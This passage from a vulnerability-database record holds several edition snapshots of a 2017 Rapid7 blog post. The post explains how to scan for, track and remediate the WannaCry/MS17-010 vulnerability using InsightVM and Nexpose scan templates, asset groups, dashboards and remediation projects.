margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a 
href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! 
If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR <span style=\"color: #000000; font-family: Calibri; font-size: 16px; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0146\"</span> OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 14pt;\"><strong>Creating a SQL Query Export</strong></span></p><p>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting</a> </p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. 
To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. 
If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:f32fe863-cd13-4685-b0f5-aea5b4ded9f0] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-22T15:17:48", "lastseen": "2017-05-25T17:57:11"}, "differentElements": ["description", "cvelist", "published", "modified"], "edition": 6}, {"lastseen": "2017-05-17T14:49:14", "bulletin": {"published": "2017-05-17T13:59:04", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 11, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- 
[DocumentBodyStart:c0f66ace-52ba-4423-a175-b0606ee06294] --><div class=\"jive-rendered-content\"><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><strong> </strong></span>&#160;</p><p><span style=\"font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong style=\"color: black;\">***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong style=\"color: black;\">For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong style=\"color: black;\">The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><strong> </strong></span>&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. 
First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. 
Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. 
Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Now, under \"By Category\" click &ldquo;Remove Categories&#8221;, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. 
And finally, under Check Type, click &ldquo;Remove Check Types&#8221;, select all, and click save</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). 
To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; 
font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. 
To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. 
If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:c0f66ace-52ba-4423-a175-b0606ee06294] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-17T13:59:04", "lastseen": "2017-05-17T14:49:14"}, "differentElements": ["description", "published", "modified"], "edition": 1}, {"lastseen": "2017-05-18T16:49:32", "bulletin": {"published": "2017-05-18T16:33:44", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 15, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- 
[DocumentBodyStart:040bdfaf-c803-4908-9a24-8e9090b7e64f] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in the WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/17/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from the scan instructions, as they were not strictly necessary and were causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. 
</strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access, an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating, we want to keep this simple. 
First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. 
Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" 